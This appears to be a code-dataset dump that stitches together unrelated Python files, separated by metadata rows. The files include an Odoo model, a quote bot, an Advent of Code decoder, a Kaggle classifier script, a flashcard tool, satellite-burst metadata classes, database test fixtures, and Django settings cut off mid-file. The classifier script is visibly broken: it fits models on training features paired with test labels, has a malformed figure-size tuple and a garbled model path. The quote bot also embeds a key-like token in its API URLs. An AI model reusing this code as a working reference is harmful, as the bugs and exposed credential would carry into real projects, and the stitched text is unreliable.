from odoo import fields, models
class ResCompany(models.Model):
_inherit = "res.company"
gross_income_jurisdiction_ids = fields.Many2many(
related='partner_id.gross_income_jurisdiction_ids',
readonly=False,
)
# TODO this field could be defined directly on l10n_ar_account_withholding
arba_cit = fields.Char(
'CIT ARBA',
help='Clave de Identificación Tributaria de ARBA',
)
# la fecha de comienzo de actividades puede ser por cada punto de
#venta distinta, lo convertimos a related del partner
l10n_ar_afip_start_date = fields.Date(
related='partner_id.start_date', string='Activities Start',
readonly=False)
l10n_ar_report_signature = fields.Image('Firma', copy=False, attachment=True)
l10n_ar_report_signed_by = fields.Text('Aclaracion', copy=False)
| 39.142857
| 81
| 0.620438
| 815
| 0.742935
| 0
| 0
| 0
| 0
| 0
| 0
| 606
| 0.552416
|
5576c4dbc04cfe8f5be4007143719bb7a25f5574
| 2,033
|
py
|
Python
|
Quotebot/utils.py
|
musawakiliML/Whatsapp-Bots
|
29fe6c645010ddedac1424b22c842b3e61511644
|
[
"MIT"
] | null | null | null |
Quotebot/utils.py
|
musawakiliML/Whatsapp-Bots
|
29fe6c645010ddedac1424b22c842b3e61511644
|
[
"MIT"
] | null | null | null |
Quotebot/utils.py
|
musawakiliML/Whatsapp-Bots
|
29fe6c645010ddedac1424b22c842b3e61511644
|
[
"MIT"
] | null | null | null |
import requests
def random_quote(type=''):
'''A function to get random quotes'''
if type == "today":
response_quote = requests.get("https://zenquotes.io/api/today/ff5e73b15a05ca51951b758bd7943ce803d71772")
if response_quote.status_code == 200:
quote_data = response_quote.json()
quote = quote_data[0]['q']
quote_author = quote_data[0]['a']
quote_message = f"'{quote_author.title()}' Said:{quote}"
return quote_message
else:
return f"Invalid Request {response_quote.status_code}"
elif type == "quote":
response_quote = requests.get("https://zenquotes.io/api/random/ff5e73b15a05ca51951b758bd7943ce803d71772")
if response_quote.status_code == 200:
quote_data = response_quote.json()
quote = quote_data[0]['q']
quote_author = quote_data[0]['a']
quote_message = f"'{quote_author.title()}' Said:{quote}"
return quote_message
else:
return f"Invalid Request {response_quote.status_code}"
else:
return f"Invalid Request!"
def jokes():
'''This function gets a joke'''
response_joke = requests.get("https://some-random-api.ml/joke")
if response_joke.status_code == 200:
joke = response_joke.json()
return joke['joke']
else:
return f"Invalid Request {response_joke.status_code}"
def cat_dog(input_message):
if "cat" in input_message and "gif" in input_message:
response_gif = requests.get("https://cataas.com/cat")
cat_gif = response_gif.url
return cat_gif
elif "cat" in input_message:
response_cat = requests.get("https://cataas.com/cat/cute")
cat = response_cat.url
return cat
elif "dog" in input_message:
response_dog = requests.get("https://dog.ceo/api/breeds/image/random")
dog_data = response_dog.json()['message']
return dog_data
else:
return "Invalid Request!"
| 31.765625
| 113
| 0.624693
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 662
| 0.325627
|
557a41cb5f2fe81007b03e1796d482334c493ead
| 3,401
|
py
|
Python
|
src/day16.py
|
dcbriccetti/advent-of-code-2021-python
|
65958fb256234cf882714d3c3306cdbf60bcc0ae
|
[
"Unlicense"
] | 4
|
2021-12-10T22:47:56.000Z
|
2021-12-26T21:35:58.000Z
|
src/day16.py
|
dcbriccetti/advent-of-code-2021-python
|
65958fb256234cf882714d3c3306cdbf60bcc0ae
|
[
"Unlicense"
] | null | null | null |
src/day16.py
|
dcbriccetti/advent-of-code-2021-python
|
65958fb256234cf882714d3c3306cdbf60bcc0ae
|
[
"Unlicense"
] | null | null | null |
from math import prod
from pathlib import Path
class BitStream:
'Deliver integers from a stream of bits created from a hexadecimal string'
bit_str: str
pos: int
def __init__(self, hex_nibbles_str: str) -> None:
def binary_nibble_str(hex_nibble_str: str) -> str:
'Convert, for example, `e` ➜ `1110`, or `0` ➜ `0000`'
nibble = int(hex_nibble_str, 16)
bits_str = bin(nibble)[2:] # Removes the 0b at the left
padding_needed = 4 - len(bits_str)
return '0' * padding_needed + bits_str
self.bit_str = ''.join(binary_nibble_str(hex_nibble_str)
for hex_nibble_str in hex_nibbles_str)
self.pos = 0
def next_int(self, num_bits: int) -> int:
'Get the next `num_bits` bits and return them parsed as a binary number'
return int(self._next_str(num_bits), 2)
def _next_str(self, num_bits) -> str:
'Return the next `num_bits` bits as a string'
bits_str = self.bit_str[:num_bits]
self.bit_str = self.bit_str[num_bits:]
self.pos += num_bits
return bits_str
class Decoder:
'Decode the BITS packet and its nested contained packets'
bits: BitStream
versions_sum: int
operators = [
sum, prod, min, max, None,
lambda vals: int(vals[0] > vals[1]),
lambda vals: int(vals[0] < vals[1]),
lambda vals: int(vals[0] == vals[1]),
]
def __init__(self, packet_hex):
self.bits = BitStream(packet_hex)
print(f'Decoder started for {len(self.bits.bit_str)} bits {packet_hex} {self.bits.bit_str}')
self.versions_sum = 0
def parse(self, level=0) -> int:
def parse_literal() -> int:
value = 0
more: bool = True
while more:
more = bool(next_int(1))
nibble: int = next_int(4)
value = (value << 4) + nibble # Slide over and drop in new bits
print(f'{value=}')
return value
def parse_operator(type: int) -> int:
def parse_subpackets_by_length(packets_length) -> list[int]:
values: list[int] = []
print(f'{packets_length=}')
stop_pos = self.bits.pos + packets_length
while self.bits.pos < stop_pos:
values.append(self.parse(level + 1))
return values
def parse_subpackets_by_count(packet_count) -> list[int]:
print(f'{packet_count=}')
return [self.parse(level + 1) for _ in range(packet_count)]
subpacket_parsers = [parse_subpackets_by_length, parse_subpackets_by_count]
length_type_id = next_int(1)
length_or_count = next_int(15 if length_type_id == 0 else 11)
values = subpacket_parsers[length_type_id](length_or_count)
return Decoder.operators[type](values)
next_int = self.bits.next_int
indent = ' ' * level
ver = next_int(3)
self.versions_sum += ver
type = next_int(3)
print(indent + f'{ver=}, {type=}, ', end='')
return parse_literal() if type == 4 else parse_operator(type)
if __name__ == '__main__':
decoder = Decoder(Path('../data/16.txt').read_text().strip())
print(f'Result: {decoder.parse()}, versions sum: {decoder.versions_sum}')
| 36.180851
| 100
| 0.586004
| 3,182
| 0.934508
| 0
| 0
| 0
| 0
| 0
| 0
| 623
| 0.182966
|
557ac6c635a14924685b462c2a901a11408e15a1
| 6,328
|
py
|
Python
|
Santander-spyder.py
|
Herikc2/Santander-Customer-Satisfaction
|
c868538ab06c252b2f9e51bac384b0f6e48efd70
|
[
"MIT"
] | null | null | null |
Santander-spyder.py
|
Herikc2/Santander-Customer-Satisfaction
|
c868538ab06c252b2f9e51bac384b0f6e48efd70
|
[
"MIT"
] | null | null | null |
Santander-spyder.py
|
Herikc2/Santander-Customer-Satisfaction
|
c868538ab06c252b2f9e51bac384b0f6e48efd70
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 3 17:13:15 2021
Database: https://www.kaggle.com/c/santander-customer-satisfaction
@author: Herikc Brecher
"""
# Import from libraries
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import train_test_split
from xgboost import XGBClassifier
import pandas as pd
from sklearn.preprocessing import Normalizer
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
import seaborn as sns
import pickle
import warnings
warnings.filterwarnings("ignore")
# Loading the training dataset in CSV format
training_file = 'data/train.csv'
test_file = 'data/test.csv'
data_training = pd.read_csv(training_file)
test_data = pd.read_csv (test_file)
print(data_training.shape)
print(test_data.shape)
# Viewing the first 20 lines
data_training.head (20)
# Data type of each attribute
data_training.dtypes
# Statistical Summary
data_training.describe()
# Distribution of classes
data_training.groupby("TARGET").size()
# Dividing by class
data_class_0 = data_training[data_training['TARGET'] == 0]
data_class_1 = data_training[data_training['TARGET'] == 1]
counter_class_0 = data_class_0.shape[0]
contador_classe_1 = data_class_1.shape[0]
data_class_0_sample = data_class_0.sample(counter_class_0)
training_data = pd.concat([data_class_0_sample, data_class_1], axis = 0)
# Pearson correlation
data_training.corr(method = 'pearson')
# Finding the correlation between the target variable and the predictor variables
corr = training_data[training_data.columns [1:]].corr()['TARGET'][:].abs()
minimal_correlation = 0.02
corr2 = corr[corr > minimal_correlation]
corr2.shape
corr2
corr_keys = corr2.index.tolist()
data_filter = data_training[corr_keys]
data_filter.head(20)
data_filter.dtypes
# Filtering only the columns that have a correlation above the minimum variable
array_treino = data_training[corr_keys].values
# Separating the array into input and output components for training data
X = array_treino[:, 0:array_treino.shape[1] - 1]
Y = array_treino[:, array_treino.shape[1] - 1]
# Creating the training and test dataset
test_size = 0.30
X_training, X_testing, Y_training, Y_testing = train_test_split(X, Y, test_size = test_size)
# Generating normalized data
scaler = Normalizer (). fit (X_training)
normalizedX_treino = scaler.transform(X_training)
scaler = Normalizer().fit(X_testing)
normalizedX_teste = scaler.transform(X_testing)
Y_training = Y_training.astype('int')
Y_testing = Y_testing.astype('int')
'''
Execution of a series of classification algorithms is based on those that have the best result.
For this test, the training base is used without any treatment or data selection.
'''
# Setting the number of folds for cross validation
num_folds = 10
# Preparing the list of models
models = []
models.append(('LR', LogisticRegression()))
models.append(('LDA', LinearDiscriminantAnalysis()))
models.append(('NB', GaussianNB()))
models.append(('KNN', KNeighborsClassifier()))
models.append(('CART', DecisionTreeClassifier()))
models.append(('SVM', SVC()))
results = []
names = []
for name, model in models:
kfold = KFold (n_splits = num_folds)
cv_results = cross_val_score (model, X_training, Y_training, cv = kfold, scoring = 'accuracy')
results.append (cv_results)
names.append (name)
msg = "% s:% f (% f)"% (name, cv_results.mean (), cv_results.std ())
print (msg)
# Boxplot to compare the algorithms
fig = plt.figure ()
fig.suptitle ('Comparison of Classification Algorithms')
ax = fig.add_subplot (111)
plt.boxplot (results)
ax.set_xticklabels (names)
plt.show ()
# Function to evaluate the performance of the model and save it in a pickle format for future reuse.
def model_report(model_name):
# Print result
print("Accuracy:% .3f"% score)
# Making predictions and building the Confusion Matrix
predictions = result.predict(X_testing)
matrix = confusion_matrix(Y_testing, predictions)
print(matrix)
report = classification_report(Y_testing, predictions)
print(report)
# The precision matrix is created to visualize the number of correct cases
labels = ['SATISFIED', 'UNSATISFIED']
cm = confusion_matrix(Y_testing, predictions)
cm = pd.DataFrame(cm, index = ['0', '1'], columns = ['0', '1'])
plt.figure(figsize = (10.10))
sns.heatmap(cm, cmap = "Blues", linecolor = 'black', linewidth = 1, annot = True, fmt = '', xticklabels = labels, yticklabels = labels)
# Saving the model
file = 'models/final_classifier_model' + model_name + '.sav'
pickle.dump (model, open(file, 'wb'))
print("Saved Model!")
# Linear Regression
model = LogisticRegression()
result = model.fit(normalizedX_treino, Y_testing)
score = result.score(normalizedX_treino, Y_testing)
model_report("LR")
# Linear Discriminant Analysis
model = LinearDiscriminantAnalysis()
result = model.fit(X_training, Y_testing)
score = result.score(X_training, Y_testing)
model_report("LDA")
# KNN
model = KNeighborsClassifier()
result = model.fit(normalizedX_treino, Y_testing)
score = result.score(normalizedX_treino, Y_testing)
model_report("KNN")
# CART
model = DecisionTreeClassifier()
result = model.fit(X_training, Y_testing)
score = result.score(X_training, Y_testing)
model_report("CART")
# XGBOOST
model = XGBClassifier()
result = model.fit(X_training, Y_testing)
score = result.score(X_training, Y_testing)
model_report("XGBOOST")
# Loading the model
file = 'models model_classifier_final_XGBOOST.sav'
model_classifier = pickle.load(open(file, 'rb'))
model_prod = model_classifier.score(X_testing, Y_testing)
print("Uploaded Model")
# Print Result
print("Accuracy:% .3f"% (model_prod.mean () * 100))
| 30.423077
| 140
| 0.733881
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,798
| 0.283955
|
557b0f82fa2e590f23c344cfc48bb3aef2ee423d
| 4,502
|
py
|
Python
|
Memorization Tool/task/tool.py
|
soukalli/jetbrain-accademy
|
fc486d439b4b54a58956e1186eb69c56b85f85f1
|
[
"MIT"
] | null | null | null |
Memorization Tool/task/tool.py
|
soukalli/jetbrain-accademy
|
fc486d439b4b54a58956e1186eb69c56b85f85f1
|
[
"MIT"
] | null | null | null |
Memorization Tool/task/tool.py
|
soukalli/jetbrain-accademy
|
fc486d439b4b54a58956e1186eb69c56b85f85f1
|
[
"MIT"
] | null | null | null |
# write your code here
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Integer
from sqlalchemy.orm import sessionmaker
engine = create_engine('sqlite:///flashcard.db?check_same_thread=False')
Base = declarative_base()
Session = sessionmaker(bind=engine)
session = Session()
successor = {'A': 'B', 'B': 'C'}
class FlashCard(Base):
__tablename__ = 'flashcard'
id = Column(Integer, primary_key=True)
question = Column(String(255))
answer = Column(String(255))
box = Column(String(1))
Base.metadata.create_all(engine)
def print_main_menu():
print("1. Add flashcards")
print("2. Practice flashcards")
print("3. Exit")
def process_menu_1():
sub_menu_choice = ""
while sub_menu_choice != "2":
print("1. Add a new flashcard")
print("2. Exit")
sub_menu_choice = input()
if sub_menu_choice == "1":
print("Question:")
question = input()
while question.strip() == "":
print("Question:")
question = input()
print("Answer:")
answer = input()
while answer.strip() == "":
print("Answer:")
answer = input()
card = FlashCard(question=question, answer=answer, box='A')
session.add(card)
session.commit()
elif sub_menu_choice != "2":
print("{0} is not an option".format(sub_menu_choice))
def update_card_status(flashcard, is_success):
if not is_success:
flashcard.box = 'A'
else:
if flashcard.box == 'C':
session.delete(flashcard)
else:
flashcard.box = successor.get(flashcard.box)
session.commit()
def process_confirmation_flashcard(flashcard):
print("Answer: {}".format(flashcard.answer))
def process_answer_flashcard(flashcard):
print('press "y" if your answer is correct:')
print('press "n" if your answer is wrong:')
choice = ""
while choice != "y" and choice != "n":
choice = input()
if choice == "y" or choice == "n":
update_card_status(flashcard, choice == "y")
break
else:
print("{0} is not an option".format(choice))
def process_update_flashcard(flashcard):
print('press "d" to delete the flashcard:')
print('press "e" to edit the flashcard:')
choice = ""
while choice != "d" and choice != "e":
choice = input()
if choice == "e":
print("current question: {0}".format(flashcard.question))
question = input("please write a new question:\n")
flashcard.question = question
print("current answer: {0}".format(flashcard.answer))
answer = input("please write a new answer:\n")
flashcard.answer = answer
global session
session.commit()
break
elif choice == "d":
session.delete(flashcard)
break
else:
print("{0} is not an option".format(choice))
def process_flashcard(flashcard):
print("Question: {}".format(flashcard.question))
print('press "y" to see the answer:')
print('press "n" to skip:')
print('press "u" to update:')
sub_menu_choice = ""
while sub_menu_choice != "n":
sub_menu_choice = input()
if sub_menu_choice == "y":
process_confirmation_flashcard(flashcard)
process_answer_flashcard(flashcard)
break
elif sub_menu_choice == "n":
process_answer_flashcard(flashcard)
break
elif sub_menu_choice == "u":
process_update_flashcard(flashcard)
break
elif sub_menu_choice != "n":
print("{0} is not an option".format(sub_menu_choice))
def process_menu_2():
flashcards = session.query(FlashCard).all()
if len(flashcards) == 0:
print('There is no flashcard to practice!')
else:
for flashcard in flashcards:
process_flashcard(flashcard)
def process_main_menu(choice):
if choice == "1":
process_menu_1()
elif choice == "2":
process_menu_2()
elif choice != "3":
print("{} is not an option".format(choice))
def main_loop():
choice = ""
while choice != "3":
print_main_menu()
choice = input()
process_main_menu(choice)
print("Bye!")
main_loop()
| 28.675159
| 72
| 0.589294
| 194
| 0.043092
| 0
| 0
| 0
| 0
| 0
| 0
| 803
| 0.178365
|
557b20fb22a3ac884a03a5ffa7db1db58d06ea7c
| 9,862
|
py
|
Python
|
src/compass/utils/geo_metadata.py
|
vbrancat/COMPASS
|
285412ac2fc474e789e255dae16eba4485017c07
|
[
"Apache-2.0"
] | 11
|
2021-11-24T07:24:11.000Z
|
2022-03-23T16:40:13.000Z
|
src/compass/utils/geo_metadata.py
|
vbrancat/COMPASS
|
285412ac2fc474e789e255dae16eba4485017c07
|
[
"Apache-2.0"
] | 6
|
2021-12-15T16:45:58.000Z
|
2022-03-24T23:36:16.000Z
|
src/compass/utils/geo_metadata.py
|
LiangJYu/COMPASS
|
459f5d6cf05c2b7c9013f0d862bfef22af280fa6
|
[
"Apache-2.0"
] | 4
|
2021-12-07T19:45:26.000Z
|
2022-02-28T23:05:37.000Z
|
from dataclasses import dataclass
from datetime import datetime
import json
from types import SimpleNamespace
import isce3
from isce3.core import LUT2d, Poly1d, Orbit
from isce3.product import GeoGridParameters
import numpy as np
from ruamel.yaml import YAML
from shapely.geometry import Point, Polygon
from compass.utils.geo_runconfig import GeoRunConfig
from compass.utils.raster_polygon import get_boundary_polygon
from compass.utils.wrap_namespace import wrap_namespace, unwrap_to_dict
def _poly1d_from_dict(poly1d_dict) -> Poly1d:
return Poly1d(poly1d_dict['coeffs'], poly1d_dict['mean'],
poly1d_dict['std'])
def _lut2d_from_dict(lut2d_dict) -> LUT2d:
lut2d_shape = (lut2d_dict['length'], lut2d_dict['width'])
lut2d_data = np.array(lut2d_dict['data']).reshape(lut2d_shape)
return LUT2d(lut2d_dict['x_start'], lut2d_dict['y_start'],
lut2d_dict['x_spacing'], lut2d_dict['y_spacing'],
lut2d_data)
def _orbit_from_dict(orbit_dict) -> Orbit:
ref_epoch = isce3.core.DateTime(orbit_dict['ref_epoch'])
# build state vector
dt = float(orbit_dict['time']['spacing'])
t0 = ref_epoch + isce3.core.TimeDelta(float(orbit_dict['time']['first']))
n_pts = int(orbit_dict['time']['size'])
orbit_sv = [[]] * n_pts
for i in range(n_pts):
t = t0 + isce3.core.TimeDelta(i * dt)
pos = [float(orbit_dict[f'position_{xyz}'][i]) for xyz in 'xyz']
vel = [float(orbit_dict[f'velocity_{xyz}'][i]) for xyz in 'xyz']
orbit_sv[i] = isce3.core.StateVector(t, pos, vel)
return Orbit(orbit_sv, ref_epoch)
@dataclass(frozen=True)
class GeoCslcMetadata():
# subset of burst class attributes
sensing_start: datetime
sensing_stop: datetime
radar_center_frequency: float
wavelength: float
azimuth_steer_rate: float
azimuth_time_interval: float
slant_range_time: float
starting_range: float
range_sampling_rate: float
range_pixel_spacing: float
azimuth_fm_rate: Poly1d
doppler: Poly1d
range_bandwidth: float
polarization: str # {VV, VH, HH, HV}
burst_id: str # t{track_number}_iw{1,2,3}_b{burst_index}
platform_id: str # S1{A,B}
center: Point # {center lon, center lat} in degrees
border: Polygon # list of lon, lat coordinate tuples (in degrees) representing burst border
orbit: isce3.core.Orbit
orbit_direction: str
# VRT params
tiff_path: str # path to measurement tiff in SAFE/zip
i_burst: int
# window parameters
range_window_type: str
range_window_coefficient: float
runconfig: SimpleNamespace
geogrid: GeoGridParameters
nodata: str
input_data_ipf_version: str
isce3_version: str
@classmethod
def from_georunconfig(cls, cfg: GeoRunConfig):
'''Create GeoBurstMetadata class from GeoRunConfig object
Parameter:
---------
cfg : GeoRunConfig
GeoRunConfig containing geocoded burst metadata
'''
burst = cfg.bursts[0]
burst_id = burst.burst_id
geogrid = cfg.geogrids[burst_id]
# get boundary from geocoded raster
burst_id = burst.burst_id
date_str = burst.sensing_start.strftime("%Y%m%d")
pol = burst.polarization
geo_raster_path = f'{cfg.output_dir}/{burst_id}_{date_str}_{pol}.slc'
geo_boundary = get_boundary_polygon(geo_raster_path, np.nan)
center = geo_boundary.centroid
# place holders
nodata_val = '?'
ipf_ver = '?'
isce3_ver = '?'
return cls(burst.sensing_start, burst.sensing_stop,
burst.radar_center_frequency, burst.wavelength,
burst.azimuth_steer_rate, burst.azimuth_time_interval,
burst.slant_range_time, burst.starting_range,
burst.range_sampling_rate, burst.range_pixel_spacing,
burst.azimuth_fm_rate, burst.doppler.poly1d,
burst.range_bandwidth, burst.polarization, burst_id,
burst.platform_id, center, geo_boundary, burst.orbit,
burst.orbit_direction, burst.tiff_path, burst.i_burst,
burst.range_window_type, burst.range_window_coefficient,
cfg.groups, geogrid, nodata_val, ipf_ver, isce3_ver)
@classmethod
def from_file(cls, file_path: str, fmt: str):
'''Create GeoBurstMetadata class from json file
Parameter:
---------
file_path: str
File containing geocoded burst metadata
'''
if fmt == 'yaml':
yaml = YAML(typ='safe')
load = yaml.load
elif fmt == 'json':
load = json.load
else:
raise ValueError(f'{fmt} unsupported. Only "json" or "yaml" supported')
with open(file_path, 'r') as fid:
meta_dict = load(fid)
datetime_fmt = "%Y-%m-%d %H:%M:%S.%f"
sensing_start = datetime.strptime(meta_dict['sensing_start'],
datetime_fmt)
sensing_stop = datetime.strptime(meta_dict['sensing_stop'],
datetime_fmt)
azimuth_fm_rate = _poly1d_from_dict(meta_dict['azimuth_fm_rate'])
dopp_poly1d = _poly1d_from_dict(meta_dict['doppler'])
orbit = _orbit_from_dict(meta_dict['orbit'])
# init geo_runconfig
cfg = wrap_namespace(meta_dict['runconfig'])
# init geogrid
grid_dict = meta_dict['geogrid']
geogrid = GeoGridParameters(grid_dict['start_x'], grid_dict['start_y'],
grid_dict['spacing_x'],
grid_dict['spacing_y'],
grid_dict['length'], grid_dict['width'],
grid_dict['epsg'])
# get boundary from geocoded raster
product_path = cfg.product_path_group.product_path
date_str = sensing_start.strftime("%Y%m%d")
burst_id = meta_dict['burst_id']
pol = meta_dict['polarization']
output_dir = f'{product_path}/{burst_id}/{date_str}'
file_stem = f'geo_{burst_id}_{pol}'
geo_raster_path = f'{output_dir}/{file_stem}'
geo_boundary = get_boundary_polygon(geo_raster_path, np.nan)
center = geo_boundary.centroid
return cls(sensing_start, sensing_stop,
meta_dict['radar_center_frequency'],
meta_dict['wavelength'], meta_dict['azimuth_steer_rate'],
meta_dict['azimuth_time_interval'],
meta_dict['slant_range_time'], meta_dict['starting_range'],
meta_dict['range_sampling_rate'],
meta_dict['range_pixel_spacing'], azimuth_fm_rate,
dopp_poly1d, meta_dict['range_bandwidth'], pol,
meta_dict['burst_id'], meta_dict['platform_id'],
center, geo_boundary, orbit, meta_dict['orbit_direction'],
meta_dict['tiff_path'], meta_dict['i_burst'],
meta_dict['range_window_type'],
meta_dict['range_window_coefficient'], cfg, geogrid,
meta_dict['nodata'], meta_dict['input_data_ipf_version'],
meta_dict['isce3_version'])
def as_dict(self):
''' Convert self to dict for write to YAML/JSON
'''
self_as_dict = {}
for key, val in self.__dict__.items():
if key in ['border', 'center', 'sensing_start', 'sensing_stop']:
val = str(val)
elif isinstance(val, np.float64):
val = float(val)
elif key in ['azimuth_fm_rate', 'doppler']:
temp = {}
temp['order'] = val.order
temp['mean'] = val.mean
temp['std'] = val.std
temp['coeffs'] = val.coeffs
val = temp
elif key == 'orbit':
temp = {}
temp['ref_epoch'] = str(val.reference_epoch)
temp['time'] = {}
temp['time']['first'] = val.time.first
temp['time']['spacing'] = val.time.spacing
temp['time']['last'] = val.time.last
temp['time']['size'] = val.time.size
temp['position_x'] = val.position[:,0].tolist()
temp['position_y'] = val.position[:,1].tolist()
temp['position_z'] = val.position[:,2].tolist()
temp['velocity_x'] = val.velocity[:,0].tolist()
temp['velocity_y'] = val.velocity[:,1].tolist()
temp['velocity_z'] = val.velocity[:,2].tolist()
val = temp
elif key == 'runconfig':
val = unwrap_to_dict(val)
elif key == 'geogrid':
temp = {}
temp['start_x'] = val.start_x
temp['start_y'] = val.start_y
temp['spacing_x'] = val.spacing_x
temp['spacing_y'] = val.spacing_y
temp['length'] = val.length
temp['width'] = val.width
temp['epsg'] = val.epsg
val = temp
self_as_dict[key] = val
return self_as_dict
def to_file(self, dst, fmt:str):
'''Write self to file
Parameter:
---------
dst: file pointer
File object to write metadata to
fmt: ['yaml', 'json']
Format of output
'''
self_as_dict = self.as_dict()
if fmt == 'yaml':
yaml = YAML(typ='safe')
yaml.dump(self_as_dict, dst)
elif fmt == 'json':
json.dump(self_as_dict, dst, indent=4)
else:
raise ValueError(f'{fmt} unsupported. Only "json" or "yaml" supported')
| 37.930769
| 95
| 0.58548
| 8,219
| 0.833401
| 0
| 0
| 8,243
| 0.835835
| 0
| 0
| 2,373
| 0.240621
|
557c04366bccd072c61ed9301e5aeee3a5f38113
| 142
|
py
|
Python
|
app.py
|
WIZ7ZY/flask-app
|
b59b0b84543c4f0faf40c57b4753a3c324edc2d8
|
[
"MIT"
] | null | null | null |
app.py
|
WIZ7ZY/flask-app
|
b59b0b84543c4f0faf40c57b4753a3c324edc2d8
|
[
"MIT"
] | null | null | null |
app.py
|
WIZ7ZY/flask-app
|
b59b0b84543c4f0faf40c57b4753a3c324edc2d8
|
[
"MIT"
] | null | null | null |
from web import create_app
import ntplib
if __name__ == '__main__':
app = create_app(debug=False)
app.run(host='0.0.0.0', port=5000)
| 20.285714
| 38
| 0.690141
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 19
| 0.133803
|
557fbf2a8059c9beebbcd0bd1552ded759c8e7f0
| 2,227
|
py
|
Python
|
tests/test_db.py
|
andreasgrv/methinks
|
5c65fdb84e35b8082ee35963431a352e06f4af44
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_db.py
|
andreasgrv/methinks
|
5c65fdb84e35b8082ee35963431a352e06f4af44
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_db.py
|
andreasgrv/methinks
|
5c65fdb84e35b8082ee35963431a352e06f4af44
|
[
"BSD-3-Clause"
] | null | null | null |
import datetime
from methinks.db import Entry
import pytest
from server.app import create_app
from server.app import db as _db
from sqlalchemy import event
from sqlalchemy.orm import sessionmaker
@pytest.fixture(scope="session")
def app(request):
"""
Returns session-wide application.
"""
return create_app()
@pytest.fixture(scope="session")
def db(app, request):
"""
Returns session-wide initialised database.
"""
with app.app_context():
_db.drop_all()
_db.create_all()
@pytest.fixture(scope="function", autouse=True)
def session(app, db, request):
"""
Returns function-scoped session.
"""
with app.app_context():
conn = _db.engine.connect()
txn = conn.begin()
options = dict(bind=conn, binds={})
sess = _db.create_scoped_session(options=options)
# establish a SAVEPOINT just before beginning the test
# (http://docs.sqlalchemy.org/en/latest/orm/session_transaction.html#using-savepoint)
sess.begin_nested()
@event.listens_for(sess(), 'after_transaction_end')
def restart_savepoint(sess2, trans):
# Detecting whether this is indeed the nested transaction of the test
if trans.nested and not trans._parent.nested:
# The test should have normally called session.commit(),
# but to be safe we explicitly expire the session
sess2.expire_all()
sess.begin_nested()
_db.session = sess
yield sess
# Cleanup
sess.remove()
# This instruction rollsback any commit that were executed in the tests.
txn.rollback()
conn.close()
def test_insert(session):
e = Entry(text='My example', date=datetime.date.today())
session.add(e)
session.commit()
def test_delete(session):
e = Entry(text='My example', date=datetime.date.today())
session.add(e)
session.commit()
session.delete(e)
session.commit()
def test_find_by_hash(session):
e = Entry(text='My example', date=datetime.date.today())
session.add(e)
session.commit()
first = Entry.query.filter(Entry.hexid == e.hash).first()
assert first == e
| 26.831325
| 93
| 0.64661
| 0
| 0
| 1,133
| 0.508756
| 1,502
| 0.67445
| 0
| 0
| 637
| 0.286035
|
55813ead580a9fd9024544a5265e546eab6feb28
| 3,339
|
py
|
Python
|
mysite/mysite/settings.py
|
prnake/search_engine_demo
|
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
|
[
"MIT"
] | 3
|
2020-08-08T04:44:29.000Z
|
2020-09-10T07:38:11.000Z
|
mysite/mysite/settings.py
|
prnake/search_engine_demo
|
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
|
[
"MIT"
] | null | null | null |
mysite/mysite/settings.py
|
prnake/search_engine_demo
|
57122052f63bbd054e0ca84d3c6832e6ecb00ec8
|
[
"MIT"
] | null | null | null |
import os
import environ
env = environ.Env(
# set casting, default value
DEBUG=(bool, False)
)
# reading .env file
environ.Env.read_env()
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# False if not in os.environ
DEBUG = env('DEBUG')
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('SECRET_KEY')
ADMIN_EMAIL = str(env('ADMIN_EMAIL')).split(' ')
ALLOWED_HOSTS = ['*']
SESSION_COOKIE_SECURE = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"search.apps.SearchConfig",
"scrapy.apps.ScrapyConfig",
'captcha',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
